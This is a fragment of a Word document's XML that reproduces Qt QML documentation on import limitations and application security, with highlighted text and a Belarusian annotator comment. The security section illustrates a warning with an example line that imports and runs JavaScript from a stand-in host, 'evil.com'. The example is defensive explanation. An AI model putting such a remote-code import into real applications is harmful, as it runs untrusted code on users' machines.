      </w:r>
    </w:p>
    <w:p w:rsidR="00B71BEF" w:rsidRPr="008D55B3" w:rsidRDefault="00B71BEF" w:rsidP="008D55B3">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="502" w:name="limitations"/>
      <w:bookmarkStart w:id="503" w:name="_Toc483000638"/>
      <w:bookmarkStart w:id="504" w:name="_Toc483003655"/>
      <w:bookmarkStart w:id="505" w:name="_Toc483603991"/>
      <w:bookmarkStart w:id="506" w:name="_Toc483605211"/>
      <w:bookmarkEnd w:id="502"/>
      <w:r w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Limitations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="503"/>
      <w:bookmarkEnd w:id="504"/>
      <w:bookmarkEnd w:id="505"/>
      <w:bookmarkEnd w:id="506"/>
    </w:p>
    <w:p w:rsidR="00B71BEF" w:rsidRPr="00B71BEF" w:rsidRDefault="00B71BEF" w:rsidP="00B71BEF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">statement is </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>only network transparent if it has an "as" clause</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71BEF" w:rsidRPr="00B71BEF" w:rsidRDefault="00B71BEF" w:rsidP="00B71BEF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t>More specifically:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71BEF" w:rsidRPr="00B71BEF" w:rsidRDefault="00B71BEF" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import "dir"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>only works on local file systems</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71BEF" w:rsidRPr="00B71BEF" w:rsidRDefault="00B71BEF" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import libraryUri</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>only works on local file systems</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71BEF" w:rsidRPr="00B71BEF" w:rsidRDefault="00B71BEF" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import "dir" as D</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>works network transparently</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71BEF" w:rsidRPr="00B71BEF" w:rsidRDefault="00B71BEF" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import libraryUrl as U</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>works network transparently</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71BEF" w:rsidRPr="00B71BEF" w:rsidRDefault="00B71BEF" w:rsidP="008D55B3">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="507" w:name="implications-for-application-security"/>
      <w:bookmarkStart w:id="508" w:name="_Toc483000639"/>
      <w:bookmarkStart w:id="509" w:name="_Toc483003656"/>
      <w:bookmarkStart w:id="510" w:name="_Toc483603992"/>
      <w:bookmarkStart w:id="511" w:name="_Toc483605212"/>
      <w:bookmarkEnd w:id="507"/>
      <w:r w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Implications for Application Security</w:t>
      </w:r>
      <w:bookmarkEnd w:id="508"/>
      <w:bookmarkEnd w:id="509"/>
      <w:bookmarkEnd w:id="510"/>
      <w:bookmarkEnd w:id="511"/>
    </w:p>
    <w:p w:rsidR="00B71BEF" w:rsidRPr="00B71BEF" w:rsidRDefault="00B71BEF" w:rsidP="00B71BEF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML security model</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is that QML content is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chain of trusted content: the user installs QML content that they trust in the same way as they install native Qt applications, or programs written with runtimes such as Python and Perl.</w:t>
      </w:r>
      <w:r w:rsidR="00F3106D" w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00F3106D" w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Лепей зразумець дадзеныя асаблівасці пайтона і перла.</w:t>
      </w:r>
      <w:r w:rsidR="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> That trust is establish by any of a number of mechanisms, including the availability of package signing on some platforms.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71BEF" w:rsidRPr="004F038E" w:rsidRDefault="00B71BEF" w:rsidP="00B71BEF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In order to preserve the trust of users, QML application developers </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>should not load and execute arbitrary JavaScript or QML resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="004F038E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For example, consider the QML code below:</w:t>
      </w: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71BEF">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.0</w:t>
      </w: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71BEF">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"http://evil.com/evil.js"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Evil</w:t>
      </w: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71BEF">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Component</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71BEF" w:rsidRPr="00B71BEF" w:rsidRDefault="00B71BEF" w:rsidP="00B71BE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B71BEF">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    onLoaded</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Evil</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>doEvil</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71BEF">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71BEF" w:rsidRPr="00B71BEF" w:rsidRDefault="00B71BEF" w:rsidP="00B71BEF">
      <w:pPr>
